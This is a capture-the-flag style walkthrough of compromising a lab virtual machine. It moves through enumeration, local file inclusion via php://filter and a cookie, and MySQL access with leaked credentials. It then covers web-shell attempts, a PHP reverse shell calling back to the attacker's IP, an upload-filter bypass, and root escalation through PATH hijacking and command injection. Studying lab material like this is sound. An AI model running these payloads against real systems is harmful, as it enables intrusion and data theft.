Initial foothold
- Network discovery
nmap -sn 10.0.2.27/24My target is 10.0.2.42.
2. Port scan
nmap -Pn 10.0.2.42nmap -Pn -p1000- 10.0.2.42
There’re 4 open ports: 80, 111, 3306, and 50251.
3. OS and service scan
nmap -A -p80,111,3306,50251 10.0.2.42
4. Vuln scan
nmap --script vuln -p80,111,3306,50251 10.0.2.42There’re many paths on HTTP service.
Service Enumeration
- Port 80: Apache httpd 2.4.10 ((Debian))
- Nikto scan
nikro -h http://10.0.2.42There’re more discovered paths on HTTP service.
2. Directory scan
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.42/ -x php,txt,html,sh,cgi -q
3. Access the site
Index page
Login page
Upload page
/upload directory
I noticed that ‘http://10.0.2.42/?page=login’ may be vulnerable to LFI.
- Port 111: rpcbind 2–4 (RPC #100000)
- Scan
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.0.2.42Nothing that I can do.
- Port 3306: MySQL 5.5.47–0+deb8u1
I don't have any credentials. I’ll leave it for now.
Exploitation
- Intercept the request w/ Burp Suite
http://10.0.2.42/?page=login
2. Test LFI by supplying:
http://10.0.2.42/?page=../../../../../../etc/passwdFailed
I’ll try supplying another LFI. Starting w/ config (config.php)
http://10.0.2.42/?page=php://filter/convert.base64-encode/resource=configSuccess
I’ll have to decode from base64 string. Now I have MySQL credential.
index.php
http://10.0.2.42/?page=php://filter/convert.base64-encode/resource=php://filter/convert.base64-encode/resource=index
upload.php
http://10.0.2.42/?page=php://filter/convert.base64-encode/resource=php://filter/convert.base64-encode/resource=uploadThere’s some filter for uploading function.
login.php
http://10.0.2.42/?page=php://filter/convert.base64-encode/resource=php://filter/convert.base64-encode/resource=loginThere’s bind parameter code. I cannot use SQL Injection technique.
3. Another LFI
If you read at top of the code, you’ll see that there’s cookie parameter called ‘lang’. It also has ‘include’ function which leads to LFI.
At theintercepted request, change cookie to be:
lang=../../../../../../../etc/passwdSuccess. I’ll leave it for a while.
Note all usernames and save as users.txt
4. Login to MySQL
Credential that I’ve got.
Login
mysql 10.0.2.42 -uroot -pH4u%QJ_H99
I have to restart the VM to proceed.
use mysql;Access is denied
Since I already know that there’s ‘Users’ database, I’ll access it.
use Users;show tables;select * from users;
There’re usernames w/ base64 password.
I can try to upload shell via mysql.
Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/upload/shell.php";Select "<?php echo shell_exec($_GET['cmd']);?>" into outfile "/var/www/shell.php";
Access is denied for both paths.
I decoed them w/ cyberchef
Here’s the decoded list.
5. Login to website
I can upload files.
Prepare reverse shell file and save as shell.php
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.2.27/443 0>&1'");?>
Upload
Intercept the upload request and send it, the extension is not allowed.
Change shell.php to shell.php.gif
Also failed.
Change to shell.gif
Error 002
I add ‘GIF89a;’ to bypass the filter. Succeeded.
6. Access reverse shell
Access http://10.0.2.42/upload. There’s a shell file w/ gif extension.
Prepare listener on port 443
rlwrap nc -lvp 443
Click it, nothing happens
Another way to access this file is accesfin via cookie LFI.
The file is located in:
/var/www/html/upload/
Now I got the shell.
Privilege Escalation
- Re-using credential and explore /home
Since I already have some credential, I can re-use it.
su kanepassword: iSv5Ym2GRocd /home/kanels -la
There’s ‘msgmike’ script.
strings msgmikeIt calls ‘cat /home/mike/msg.txt’
Since the script is not using command as a full path like /bin/cat. I can create fake path and call bash instead.
cd /tmpecho /bin/sh > catchmod 777 catexport PATH=/tmp:$PATH
cd /home/kane./msgmikewhoami
Now, I’m ‘mike’.
cd /home/mikels -la
There’s ‘msg2root’ script.
strings msg2root
I can supply ‘test’ for echo command and append ‘&& /bin/bash -p’ to call shell after echo command.
./msg2rootMessage for root: test && /bin/bash -p
whoamiNow, I’m root.
